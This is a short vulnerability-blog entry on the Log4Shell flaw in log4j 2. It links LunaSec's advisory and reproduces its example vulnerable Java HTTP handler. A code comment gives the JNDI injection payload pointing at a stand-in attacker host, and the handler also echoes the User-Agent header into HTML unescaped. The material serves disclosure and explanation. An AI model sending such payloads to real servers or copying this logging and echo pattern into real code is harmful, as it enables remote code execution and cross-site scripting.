TT Vulnerability Blog

A log of "personal" investigation and research on vulnerability information

Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package

【Blog】

◆Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package (LunaSec, 2021/12/09)
https://www.lunasec.io/docs/blog/log4j-zero-day/


【Related summary articles】

Overall summary

◆Log4j (Summary)
https://vul.hatenadiary.com/entry/Log4j


【Exploit Code】

import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;

public class VulnerableLog4jExampleHandler implements HttpHandler {

  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

  /**
   * A simple HTTP endpoint that reads the request's User Agent and logs it back.
   * This is basically pseudo-code to explain the vulnerability, and not a full example.
   * @param he HTTP Request Object
   */
  @Override
  public void handle(HttpExchange he) throws IOException {
    // Header lookup is case-insensitive; returns null when the header is absent.
    String userAgent = he.getRequestHeaders().getFirst("User-Agent");

    // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
    // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
    log.info("Request User Agent:{}", userAgent);

    // The header value is also echoed into the HTML response unescaped.
    String response = "<h1>Hello There, " + userAgent + "!</h1>";
    // Content-Length must be the byte count, not the character count.
    byte[] body = response.getBytes(StandardCharsets.UTF_8);
    he.sendResponseHeaders(200, body.length);
    try (OutputStream os = he.getResponseBody()) {
      os.write(body);
    }
  }
}

Source: https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code


Copyright (C) 谷川哲司 (Tetsuji Tanigawa) 2006 - 2022